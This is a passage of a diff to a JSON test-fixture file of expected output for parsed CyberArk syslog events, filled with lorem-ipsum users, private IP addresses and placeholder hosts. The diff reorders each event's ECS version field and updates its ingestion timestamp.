1.1382\",ProductAccount=\"animi\",ProductProcess=\"oluptate\",EventId=\"ofdeF\",EventClass=\"tion\",EventSeverity=\"very-high\",EventMessage=\"deny\",ActingUserName=\"quiratio\",ActingAddress=\"10.116.120.216\",ActionSourceUser=\"qua\",ActionTargetUser=\"umdo\",ActionObject=\"sed\",ActionSafe=\"apariat\",ActionLocation=\"mol\",ActionCategory=\"pteursi\",ActionRequestId=\"onse\",ActionReason=\"rumet\",ActionExtraDetails=\"oll\"", "event": { - "ingested": "2021-06-09T10:19:22.410044100Z" + "ingested": "2021-12-14T14:41:55.823542083Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Ciceroi 2016-05-22 14:30:33.812538723 +0000 UTC aveniam1436.www.test %CYBERARK: MessageID=\"144\";Version=1.5529;Message=cancel;Issuer=taevi;Station=10.62.54.220;File=ehenderi;Safe=pidatat;Location=gni;Category=tquiinea;RequestId=mquaera;Reason=dun;Severity=medium;SourceUser=Duisau;TargetUser=psum;GatewayStation=10.57.40.29;TicketID=undeo;PolicyID=loremip;UserName=rnatura;LogonDomain=isqu7224.localdomain;Address=idolores3839.localdomain;CPMStatus=metcon;Port=2424;Database=emeumfug;DeviceType=upta;ExtraDetails=omn;", "event": { - "ingested": "2021-06-09T10:19:22.410050Z" + "ingested": "2021-12-14T14:41:55.823542469Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ons 2016-06-05 21:33:08.072538723 +0000 UTC tessec3539.home %CYBERARK: MessageID=\"240\";nsect 1.6476\",ProductAccount=\"tnon\",ProductProcess=\"ionul\",EventId=\"nibus\",EventClass=\"edquiano\",EventSeverity=\"medium\",EventMessage=\"cancel\",ActingUserName=\"ema\",ActingAddress=\"10.74.237.180\",ActionSourceUser=\"nsequu\",ActionTargetUser=\"cup\",ActionObject=\"boNemoen\",ActionSafe=\"uid\",ActionLocation=\"rors\",ActionCategory=\"onofd\",ActionRequestId=\"taed\",ActionReason=\"lup\",ActionExtraDetails=\"remeumf\"", "event": { - "ingested": 
"2021-06-09T10:19:22.410055600Z" + "ingested": "2021-12-14T14:41:55.823542948Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-06-20 04:35:42.332538723 +0000 UTC sectetur3333.mail.example %CYBERARK: MessageID=\"61\";edqui 1.7780\",ProductAccount=\"lor\",ProductProcess=\"fugit\",EventId=\"ido\",EventClass=\"paqu\",EventSeverity=\"high\",EventMessage=\"allow\",ActingUserName=\"remeum\",ActingAddress=\"10.18.165.35\",ActionSourceUser=\"admi\",ActionTargetUser=\"modocons\",ActionObject=\"elaudant\",ActionSafe=\"tinvol\",ActionLocation=\"dolore\",ActionCategory=\"abor\",ActionRequestId=\"iqui\",ActionReason=\"etc\",ActionExtraDetails=\"etM\"", "event": { - "ingested": "2021-06-09T10:19:22.410062100Z" + "ingested": "2021-12-14T14:41:55.823543336Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-07-04 11:38:16.592538723 +0000 UTC xercitat4824.local %CYBERARK: MessageID=\"90\";ostr 1.4979\",ProductAccount=\"onproide\",ProductProcess=\"luptat\",EventId=\"itaut\",EventClass=\"imaven\",EventSeverity=\"high\",EventMessage=\"deny\",ActingUserName=\"tema\",ActingAddress=\"10.74.253.127\",ActionSourceUser=\"tfug\",ActionTargetUser=\"icab\",ActionObject=\"mwr\",ActionSafe=\"fugi\",ActionLocation=\"inculpaq\",ActionCategory=\"agna\",ActionRequestId=\"tionemu\",ActionReason=\"eomnisis\",ActionExtraDetails=\"mqui\"", "event": { - "ingested": "2021-06-09T10:19:22.410067400Z" + "ingested": "2021-12-14T14:41:55.823543952Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "errorsi 2016-07-18 18:40:50.852538723 +0000 UTC des5377.lan %CYBERARK: 
MessageID=\"385\";Version=1.1697;Message=block;Issuer=ono;Station=10.189.109.245;File=emaperi;Safe=tame;Location=\"tinvol\";Category=tectobe;RequestId=colabor;Reason=iusmodt;Severity=medium;GatewayStation=10.92.8.15;TicketID=agnaali;PolicyID=llitani;UserName=inima;LogonDomain=tlabo6088.www.localdomain;Address=Lor5841.internal.example;CPMStatus=sunt;Port=\"3075\";Database=uines;DeviceType=nsec;ExtraDetails=onse", "event": { - "ingested": "2021-06-09T10:19:22.410072400Z" + "ingested": "2021-12-14T14:41:55.823544349Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2 01:43:25 tat %CYBERARK: MessageID=\"190\";tion 1.1761\",ProductAccount=\"upt\",ProductProcess=\"uiineavo\",EventId=\"tisetq\",EventClass=\"irati\",EventSeverity=\"low\",EventMessage=\"accept\",ActingUserName=\"giatquov\",ActingAddress=\"10.21.78.128\",ActionSourceUser=\"riat\",ActionTargetUser=\"taut\",ActionObject=\"oreseos\",ActionSafe=\"uames\",ActionLocation=\"tati\",ActionCategory=\"utaliqu\",ActionRequestId=\"oriosamn\",ActionReason=\"deFinibu\",ActionExtraDetails=\"iadese\"", "event": { - "ingested": "2021-06-09T10:19:22.410077300Z" + "ingested": "2021-12-14T14:41:55.823544974Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"256\";eporroqu 1.4200\",ProductAccount=\"hil\",ProductProcess=\"atquovo\",EventId=\"suntinc\",EventClass=\"xeac\",EventSeverity=\"medium\",EventMessage=\"deny\",ActingUserName=\"tatn\",ActingAddress=\"10.18.109.121\",ActionSourceUser=\"ents\",ActionTargetUser=\"pida\",ActionObject=\"nse\",ActionSafe=\"sinto\",ActionLocation=\"emoeni\",ActionCategory=\"oenimips\",ActionRequestId=\"utlabore\",ActionReason=\"ecillu\",ActionExtraDetails=\"quip\"", "event": { - "ingested": "2021-06-09T10:19:22.410082400Z" + "ingested": "2021-12-14T14:41:55.823545360Z" + }, + "ecs": { + "version": 
"1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"105\";Version=1.3727;Message=cancel;Issuer=iunt;Station=10.63.37.192;File=tio;Safe=orinrepr;Location=conse;Category=rumetM;RequestId=equi;Reason=agnaali;Severity=medium;SourceUser=sitvolup;TargetUser=reetd;GatewayStation=10.225.115.13;TicketID=maccusa;PolicyID=uptat;UserName=equep;LogonDomain=iavolu5352.localhost;Address=rpo79.mail.example;CPMStatus=siarchi;Port=2289;Database=aliqu;DeviceType=olupta;ExtraDetails=mipsumd;", "event": { - "ingested": "2021-06-09T10:19:22.410087200Z" + "ingested": "2021-12-14T14:41:55.823545761Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "remi 2016-09-13 22:51:07.892538723 +0000 UTC saute7154.internal.lan %CYBERARK: MessageID=\"105\";Version=1.3219;Message=deny;Issuer=run;Station=10.47.202.102;File=quirat;Safe=llu;Location=licab;Category=eirure;RequestId=conseq;Reason=oidentsu;Severity=medium;SourceUser=aaliquaU;TargetUser=ntor;GatewayStation=10.95.64.124;TicketID=psaquae;PolicyID=ationemu;UserName=ice;LogonDomain=estiae3750.api.corp;Address=tionof7613.domain;CPMStatus=lapari;Port=2335;Database=ite;DeviceType=ationul;ExtraDetails=iquipex;", "event": { - "ingested": "2021-06-09T10:19:22.410092200Z" + "ingested": "2021-12-14T14:41:55.823546276Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "adol 2016-09-28 05:53:42.152538723 +0000 UTC doloremi7402.www.test %CYBERARK: 
MessageID=\"376\";Version=1.6371;Message=block;Issuer=itquiin;Station=10.106.239.55;File=taevit;Safe=rinrepre;Location=etconse;Category=tincu;RequestId=ari;Reason=exercit;Severity=low;GatewayStation=10.244.114.61;TicketID=oluptate;PolicyID=onseq;UserName=serunt;LogonDomain=aquaeabi7735.internal.lan;Address=acc7692.home;CPMStatus=amest;Port=\"4147\";Database=itame;DeviceType=intoc;ExtraDetails=oluptas;", "event": { - "ingested": "2021-06-09T10:19:22.410097300Z" + "ingested": "2021-12-14T14:41:55.823546731Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-10-12 12:56:16.412538723 +0000 UTC luptasn2126.mail.home %CYBERARK: MessageID=\"24\";Version=1.821;Message=allow;Issuer=ione;Station=10.125.160.129;File=suntexp;Safe=duntut;Location=magni;Category=pisciv;RequestId=iquidex;Reason=radipisc;Severity=low;SourceUser=nti;TargetUser=abi;GatewayStation=10.53.168.235;TicketID=fugitse;PolicyID=veniamq;UserName=one;LogonDomain=etMalor4236.www5.host;Address=quatD4191.local;CPMStatus=tenima;Port=5685;Database=sperna;DeviceType=eabilloi;ExtraDetails=estia;", "event": { - "ingested": "2021-06-09T10:19:22.410102800Z" + "ingested": "2021-12-14T14:41:55.823547168Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orem 2016-10-26 19:58:50.672538723 +0000 UTC beata6448.mail.test %CYBERARK: MessageID=\"197\";Version=1.1123;Message=allow;Issuer=tasuntex;Station=10.227.177.121;File=boN;Safe=eprehend;Location=aevit;Category=aboN;RequestId=ihilmo;Reason=radi;Severity=low;SourceUser=uames;TargetUser=iduntu;GatewayStation=10.33.245.220;TicketID=giatnu;PolicyID=ulapa;UserName=liqui;LogonDomain=quioffi1359.internal.lan;Address=eturadi6608.mail.host;CPMStatus=aera;Port=3366;Database=rvel;DeviceType=uid;ExtraDetails=onsecte;", "event": { - "ingested": "2021-06-09T10:19:22.410107900Z" + "ingested": 
"2021-12-14T14:41:55.823547556Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 10 03:01:24 edo %CYBERARK: MessageID=\"411\";Version=1.5071;Message=allow;Issuer=econs;Station=\"10.98.182.220\";File=\"untex\";Safe=\"quiratio\";Location=\"boree\";Category=\"eco\";RequestId=Utenimad;Reason=orpor;Severity=\"low\";GatewayStation=\"10.167.85.181\";TicketID=emvel;PolicyID=\"tmollita\";UserName=fde;LogonDomain=\"nsecte3304.mail.corp\";Address=\"eroi176.example\";CPMStatus=\"non\";Port=\"3341\";Database=equat;DeviceType=derit;ExtraDetails=\"Command=dexea;ConnectionComponentId=atcu;DstHost=labor;ProcessId=6501;ProcessName=laboree.exe;Protocol=tcp;PSMID=intocc;RDPOffset=liqu;SessionID=eporr;SrcHost=xeacomm6855.api.corp;User=utlabor;VIDOffset=rau;\"", "event": { - "ingested": "2021-06-09T10:19:22.410113200Z" + "ingested": "2021-12-14T14:41:55.823547959Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 24 10:03:59 aeabi %CYBERARK: MessageID=\"111\";eiu 1.4456\",ProductAccount=\"iciadese\",ProductProcess=\"quidolor\",EventId=\"tessec\",EventClass=\"olupta\",EventSeverity=\"high\",EventMessage=\"block\",ActingUserName=\"icabo\",ActingAddress=\"10.89.208.95\",ActionSourceUser=\"eleum\",ActionTargetUser=\"sintoc\",ActionObject=\"volupt\",ActionSafe=\"siste\",ActionLocation=\"uiinea\",ActionCategory=\"Utenima\",ActionRequestId=\"volupta\",ActionReason=\"rcitati\",ActionExtraDetails=\"eni\"", "event": { - "ingested": "2021-06-09T10:19:22.410118700Z" + "ingested": "2021-12-14T14:41:55.823548419Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Ute 2016-12-08 17:06:33.452538723 +0000 UTC sperna5368.mail.invalid %CYBERARK: 
MessageID=\"81\";Version=1.509;Message=accept;Issuer=tDuisaut;Station=10.214.191.180;File=imvenia;Safe=spi;Location=stquido;Category=ommodico;RequestId=ptas;Reason=pta;Severity=medium;SourceUser=ptatemq;TargetUser=luptatev;GatewayStation=10.72.148.32;TicketID=ipsumd;PolicyID=ntocc;UserName=uteirure;LogonDomain=nevo4284.internal.local;Address=reetdolo6852.www.test;CPMStatus=nnum;Port=5428;Database=uamest;DeviceType=tco;ExtraDetails=uae;", "event": { - "ingested": "2021-06-09T10:19:22.410124200Z" + "ingested": "2021-12-14T14:41:55.823548881Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"168\";Version=1.3599;Message=block;Issuer=ipsumd;Station=10.136.190.236;File=evolu;Safe=ersp;Location=tquov;Category=diconseq;RequestId=inven;Reason=osquira;Severity=low;SourceUser=ataevi;TargetUser=com;GatewayStation=10.252.124.150;TicketID=trud;PolicyID=eriti;UserName=litessec;LogonDomain=itas981.mail.domain;Address=mporin6932.api.localdomain;CPMStatus=roid;Port=6604;Database=tasn;DeviceType=Nemoenim;ExtraDetails=squirati;", "event": { - "ingested": "2021-06-09T10:19:22.410130400Z" + "ingested": "2021-12-14T14:41:55.823549399Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nbyCic 2017-01-06 07:11:41.972538723 +0000 UTC utlabor6305.internal.corp %CYBERARK: MessageID=\"90\";Version=1.5649;Message=accept;Issuer=iquipe;Station=10.192.34.76;File=modtemp;Safe=quovol;Location=nve;Category=remag;RequestId=uredol;Reason=ccaecat;Severity=medium;SourceUser=onsequ;TargetUser=temqu;GatewayStation=10.213.144.249;TicketID=udexerci;PolicyID=naal;UserName=lore;LogonDomain=tnonpro7635.localdomain;Address=illoin2914.mail.lan;CPMStatus=uamni;Port=6895;Database=gnamal;DeviceType=metMalo;ExtraDetails=ntexplic;", "event": { - "ingested": "2021-06-09T10:19:22.410136Z" + "ingested": 
"2021-12-14T14:41:55.823549796Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"376\";Version=1.2217;Message=accept;Issuer=untu;Station=10.154.4.197;File=con;Safe=nisist;Location=usmodte;Category=msequi;RequestId=tau;Reason=exercita;Severity=low;GatewayStation=10.216.84.30;TicketID=orumSe;PolicyID=boree;UserName=intoc;LogonDomain=rQuisau5300.www5.example;Address=evit5780.www.corp;CPMStatus=onev;Port=\"725\";Database=oditem;DeviceType=gitsedqu;ExtraDetails=borios;", "event": { - "ingested": "2021-06-09T10:19:22.410141400Z" + "ingested": "2021-12-14T14:41:55.823550479Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-02-03 21:16:50.492538723 +0000 UTC temUt631.www5.example %CYBERARK: MessageID=\"3\";npr 1.4414\",ProductAccount=\"niamqui\",ProductProcess=\"boNem\",EventId=\"ess\",EventClass=\"ipisci\",EventSeverity=\"medium\",EventMessage=\"deny\",ActingUserName=\"tqu\",ActingAddress=\"10.143.193.199\",ActionSourceUser=\"quam\",ActionTargetUser=\"quid\",ActionObject=\"fugiat\",ActionSafe=\"atisun\",ActionLocation=\"esci\",ActionCategory=\"epre\",ActionRequestId=\"tobeata\",ActionReason=\"eroinBCS\",ActionExtraDetails=\"inci\"", "event": { - "ingested": "2021-06-09T10:19:22.410147100Z" + "ingested": "2021-12-14T14:41:55.823551047Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 18 04:19:24 rnatur %CYBERARK: 
MessageID=\"140\";Version=1.5632;Message=deny;Issuer=essequam;Station=10.193.83.81;File=isisten;Safe=cusant;Location=atemq;Category=rinre;RequestId=naal;Reason=borios;Severity=high;SourceUser=isnostr;TargetUser=umqu;GatewayStation=10.65.175.9;TicketID=inesci;PolicyID=isnisi;UserName=ritatise;LogonDomain=uamei2389.internal.example;Address=uisa5736.internal.local;CPMStatus=cusant;Port=302;Database=ender;DeviceType=riamea;ExtraDetails=entorev;", "event": { - "ingested": "2021-06-09T10:19:22.410864400Z" + "ingested": "2021-12-14T14:41:55.823551659Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"87\";tutlab 1.792\",ProductAccount=\"tatn\",ProductProcess=\"dolorsit\",EventId=\"sau\",EventClass=\"aperia\",EventSeverity=\"very-high\",EventMessage=\"accept\",ActingUserName=\"umdolo\",ActingAddress=\"10.205.72.243\",ActionSourceUser=\"stenatu\",ActionTargetUser=\"isiuta\",ActionObject=\"orsitam\",ActionSafe=\"siutaliq\",ActionLocation=\"dutp\",ActionCategory=\"psaquaea\",ActionRequestId=\"taevita\",ActionReason=\"ameiusm\",ActionExtraDetails=\"proide\"", "event": { - "ingested": "2021-06-09T10:19:22.410874400Z" + "ingested": "2021-12-14T14:41:55.823552181Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-03-18 18:24:33.272538723 +0000 UTC velitess7586.mail.example %CYBERARK: MessageID=\"45\";nre 1.7231\",ProductAccount=\"sit\",ProductProcess=\"olab\",EventId=\"eumiure\",EventClass=\"ersp\",EventSeverity=\"medium\",EventMessage=\"allow\",ActingUserName=\"mquisno\",ActingAddress=\"10.107.9.163\",ActionSourceUser=\"uptate\",ActionTargetUser=\"mac\",ActionObject=\"iumdol\",ActionSafe=\"tpersp\",ActionLocation=\"stla\",ActionCategory=\"uptatema\",ActionRequestId=\"oeni\",ActionReason=\"tdol\",ActionExtraDetails=\"sit\"", "event": { - "ingested": "2021-06-09T10:19:22.410880400Z" + 
"ingested": "2021-12-14T14:41:55.823552981Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2 01:27:07 psum %CYBERARK: MessageID=\"132\";tasnulap 1.7220\",ProductAccount=\"umSe\",ProductProcess=\"xeacomm\",EventId=\"cinge\",EventClass=\"itla\",EventSeverity=\"high\",EventMessage=\"deny\",ActingUserName=\"asiarc\",ActingAddress=\"10.80.101.72\",ActionSourceUser=\"uptate\",ActionTargetUser=\"quidexea\",ActionObject=\"ect\",ActionSafe=\"modocons\",ActionLocation=\"gitsed\",ActionCategory=\"fugia\",ActionRequestId=\"oditautf\",ActionReason=\"quatu\",ActionExtraDetails=\"veli\"", "event": { - "ingested": "2021-06-09T10:19:22.410887400Z" + "ingested": "2021-12-14T14:41:55.823553674Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 16 08:29:41 labo %CYBERARK: MessageID=\"200\";Version=1.267;Message=accept;Issuer=aboreetd;Station=10.235.136.109;File=lorin;Safe=pitl;Location=por;Category=quidexea;RequestId=nimid;Reason=runtmol;Severity=very-high;SourceUser=odi;TargetUser=ptass;GatewayStation=10.39.10.155;TicketID=dol;PolicyID=proiden;UserName=urExcept;LogonDomain=miurerep1152.internal.domain;Address=utlab3706.api.host;CPMStatus=dantium;Port=246;Database=teirured;DeviceType=onemulla;ExtraDetails=dolorem;", "event": { - "ingested": "2021-06-09T10:19:22.410893300Z" + "ingested": "2021-12-14T14:41:55.823554263Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 30 15:32:16 ationev %CYBERARK: MessageID=\"233\";umdolor 
1.4389\",ProductAccount=\"itation\",ProductProcess=\"paquioff\",EventId=\"nci\",EventClass=\"isau\",EventSeverity=\"low\",EventMessage=\"cancel\",ActingUserName=\"ibusBon\",ActingAddress=\"10.96.224.19\",ActionSourceUser=\"nsequat\",ActionTargetUser=\"doloreme\",ActionObject=\"dun\",ActionSafe=\"reprehe\",ActionLocation=\"tincu\",ActionCategory=\"suntin\",ActionRequestId=\"itse\",ActionReason=\"umexerc\",ActionExtraDetails=\"oremipsu\"", "event": { - "ingested": "2021-06-09T10:19:22.410898500Z" + "ingested": "2021-12-14T14:41:55.823554858Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-05-14 22:34:50.312538723 +0000 UTC ntsunt4826.mail.corp %CYBERARK: MessageID=\"170\";olo 1.237\",ProductAccount=\"aec\",ProductProcess=\"fdeF\",EventId=\"iquidexe\",EventClass=\"diconse\",EventSeverity=\"medium\",EventMessage=\"cancel\",ActingUserName=\"reseo\",ActingAddress=\"10.71.238.250\",ActionSourceUser=\"consequa\",ActionTargetUser=\"moenimi\",ActionObject=\"olupt\",ActionSafe=\"oconsequ\",ActionLocation=\"edquiac\",ActionCategory=\"urerepr\",ActionRequestId=\"eseru\",ActionReason=\"quamest\",ActionExtraDetails=\"mac\"", "event": { - "ingested": "2021-06-09T10:19:22.410905400Z" + "ingested": "2021-12-14T14:41:55.823555578Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"294\";Version=1.3804;Message=deny;Issuer=rationev;Station=10.226.20.199;File=tatem;Safe=untutlab;Location=amcor;Category=ica;RequestId=lillum;Reason=remips;Severity=low;SourceUser=taedicta;TargetUser=ritt;GatewayStation=10.226.101.180;TicketID=itesseq;PolicyID=dictasun;UserName=veniamqu;LogonDomain=rum5798.home;Address=mvel1188.internal.localdomain;CPMStatus=tetur;Port=2694;Database=conse;DeviceType=ipi;ExtraDetails=imveniam;", "event": { - "ingested": "2021-06-09T10:19:22.410910800Z" + "ingested": 
"2021-12-14T14:41:55.823556430Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 12 12:39:58 licabo %CYBERARK: MessageID=\"13\";Version=1.1493;Message=cancel;Issuer=utaliqu;Station=10.86.22.67;File=nvolupt;Safe=oremi;Location=elites;Category=nbyCi;RequestId=tevel;Reason=usc;Severity=high;SourceUser=equinesc;TargetUser=cab;GatewayStation=10.134.65.15;TicketID=equepor;PolicyID=ncidid;UserName=quaUten;LogonDomain=nisiut3624.api.example;Address=perspici5680.domain;CPMStatus=iconseq;Port=2039;Database=isciv;DeviceType=rroqu;ExtraDetails=nofd;", "event": { - "ingested": "2021-06-09T10:19:22.410915900Z" + "ingested": "2021-12-14T14:41:55.823557076Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"358\";ilmol 1.5112\",ProductAccount=\"tten\",ProductProcess=\"ueipsa\",EventId=\"tae\",EventClass=\"autodit\",EventSeverity=\"very-high\",EventMessage=\"accept\",ActingUserName=\"cidunt\",ActingAddress=\"10.70.147.120\",ActionSourceUser=\"exeaco\",ActionTargetUser=\"emqu\",ActionObject=\"nderi\",ActionSafe=\"acommod\",ActionLocation=\"itsedd\",ActionCategory=\"leumiur\",ActionRequestId=\"eratvol\",ActionReason=\"quidol\",ActionExtraDetails=\"eaqu\"", "event": { - "ingested": "2021-06-09T10:19:22.410920600Z" + "ingested": "2021-12-14T14:41:55.823557577Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "luptatem 2017-07-11 02:45:07.352538723 +0000 UTC uaeratv3432.invalid %CYBERARK: 
MessageID=\"160\";Version=1.6255;Message=cancel;Issuer=dqu;Station=10.178.242.100;File=dutpers;Safe=erun;Location=orisn;Category=reetd;RequestId=prehen;Reason=ntutlabo;Severity=medium;SourceUser=rad;TargetUser=loi;GatewayStation=10.24.111.229;TicketID=volupt;PolicyID=rem;UserName=idid;LogonDomain=tesse1089.www.host;Address=ptateve6909.www5.lan;CPMStatus=toccaec;Port=7645;Database=tenatuse;DeviceType=psaqua;ExtraDetails=ullamcor;", "event": { - "ingested": "2021-06-09T10:19:22.410926Z" + "ingested": "2021-12-14T14:41:55.823558089Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-07-25 09:47:41.612538723 +0000 UTC cupi1867.www5.test %CYBERARK: MessageID=\"67\";orroq 1.6677\",ProductAccount=\"ritati\",ProductProcess=\"orisni\",EventId=\"ons\",EventClass=\"remagn\",EventSeverity=\"very-high\",EventMessage=\"deny\",ActingUserName=\"mmodoc\",ActingAddress=\"10.211.179.168\",ActionSourceUser=\"atu\",ActionTargetUser=\"untincul\",ActionObject=\"ssecil\",ActionSafe=\"commodi\",ActionLocation=\"emporain\",ActionCategory=\"ntiumto\",ActionRequestId=\"umetMalo\",ActionReason=\"oluptas\",ActionExtraDetails=\"emvele\"", "event": { - "ingested": "2021-06-09T10:19:22.410931400Z" + "ingested": "2021-12-14T14:41:55.823558734Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Sedut 2017-08-08 16:50:15.872538723 +0000 UTC yCiceroi2786.www.test %CYBERARK: MessageID=\"141\";iquamqua 1.4890\",ProductAccount=\"dolore\",ProductProcess=\"nsequat\",EventId=\"olorsi\",EventClass=\"aliq\",EventSeverity=\"low\",EventMessage=\"cancel\",ActingUserName=\"mven\",ActingAddress=\"10.30.243.163\",ActionSourceUser=\"oremag\",ActionTargetUser=\"illu\",ActionObject=\"ruredo\",ActionSafe=\"mac\",ActionLocation=\"temUt\",ActionCategory=\"ptassita\",ActionRequestId=\"its\",ActionReason=\"lore\",ActionExtraDetails=\"idol\"", "event": { 
- "ingested": "2021-06-09T10:19:22.410936200Z" + "ingested": "2021-12-14T14:41:55.823559296Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-08-22 23:52:50.132538723 +0000 UTC urmag7650.api.invalid %CYBERARK: MessageID=\"26\";Version=1.1844;Message=cancel;Issuer=amvo;Station=10.6.79.159;File=ommodo;Safe=uptat;Location=idex;Category=ptateve;RequestId=cons;Reason=olorese;Severity=high;SourceUser=ore;TargetUser=quid;GatewayStation=10.212.214.4;TicketID=ddoeius;PolicyID=ugiatn;UserName=midestl;LogonDomain=dictasun3878.internal.localhost;Address=modocon5089.mail.example;CPMStatus=lupta;Port=5112;Database=urExce;DeviceType=asi;ExtraDetails=ectiono;", "event": { - "ingested": "2021-06-09T10:19:22.410940800Z" + "ingested": "2021-12-14T14:41:55.823559847Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "onu 2017-09-06 06:55:24.392538723 +0000 UTC liquaUte6729.api.localhost %CYBERARK: MessageID=\"150\";Version=1.3546;Message=deny;Issuer=atDu;Station=10.237.170.202;File=maperi;Safe=agnaaliq;Location=tlaboree;Category=norumet;RequestId=dtempo;Reason=tin;Severity=low;SourceUser=mve;TargetUser=liquide;GatewayStation=10.70.147.46;TicketID=inv;PolicyID=rroq;UserName=rcit;LogonDomain=aecatcup2241.www5.test;Address=tempor1282.www5.localhost;CPMStatus=incidid;Port=7699;Database=taedict;DeviceType=edquian;ExtraDetails=loremeu;", "event": { - "ingested": "2021-06-09T10:19:22.410945700Z" + "ingested": "2021-12-14T14:41:55.823560672Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmi 2017-09-20 13:57:58.652538723 +0000 UTC untexpl2847.www5.local %CYBERARK: 
MessageID=\"292\";Version=1.4282;Message=allow;Issuer=emoe;Station=10.179.50.138;File=ehende;Safe=eaqueip;Location=eum;Category=lamc;RequestId=umetMal;Reason=asper;Severity=high;SourceUser=metcons;TargetUser=itasper;GatewayStation=10.228.118.81;TicketID=temquiav;PolicyID=obeata;UserName=tatemU;LogonDomain=mad5185.www5.localhost;Address=mipsum2964.invalid;CPMStatus=doei;Port=6825;Database=toditaut;DeviceType=voluptat;ExtraDetails=ugit;", "event": { - "ingested": "2021-06-09T10:19:22.410950800Z" + "ingested": "2021-12-14T14:41:55.823561322Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 4 21:00:32 asnu %CYBERARK: MessageID=\"38\";Version=1.3806;Message=cancel;Issuer=henderit;Station=10.49.71.118;File=ationul;Safe=mquisn;Location=queips;Category=midest;RequestId=dex;Reason=ccae;Severity=medium;SourceUser=eavolup;TargetUser=emip;GatewayStation=10.234.165.130;TicketID=ntexplic;PolicyID=uto;UserName=iuntNequ;LogonDomain=esseq7889.www.invalid;Address=veniamq1236.invalid;CPMStatus=emo;Port=1458;Database=veniamqu;DeviceType=licaboN;ExtraDetails=atquo;", "event": { - "ingested": 